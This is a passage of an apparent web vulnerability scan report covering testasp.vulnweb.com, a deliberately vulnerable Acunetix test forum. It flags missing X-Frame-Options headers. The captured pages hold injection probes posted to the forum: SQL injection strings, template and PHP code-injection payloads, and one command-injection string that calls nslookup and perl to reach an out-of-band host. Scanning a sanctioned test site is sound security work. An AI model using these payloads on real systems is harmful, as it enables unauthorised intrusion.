Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4192 |
Response Body - size: 4,192 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 2+497-497-1=0+0+0+1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 2+497-497-1=0+0+0+1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 2+497-497-1=0+0+0+1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4128 |
Response Body - size: 4,128 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>995022</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4180 |
Response Body - size: 4,180 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx{{98991*97996}}xca </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx{{98991*97996}}xca </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx{{98991*97996}}xca - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4147 |
Response Body - size: 4,147 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>";print(md5(31337));$a="</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4402 |
Response Body - size: 4,402 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>;(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")|(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")&(nslookup hitkbpyllncjlfe305.bxss.me||perl -e "gethostbyname('hitkbpyllncjlfe305.bxss.me')")</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4192 |
Response Body - size: 4,192 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3+497-497-1=0+0+0+1 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3+497-497-1=0+0+0+1 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3+497-497-1=0+0+0+1 - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4144 |
Response Body - size: 4,144 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>${@print(md5(31337))}</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
Method | GET |
Parameter | X-Frame-Options |
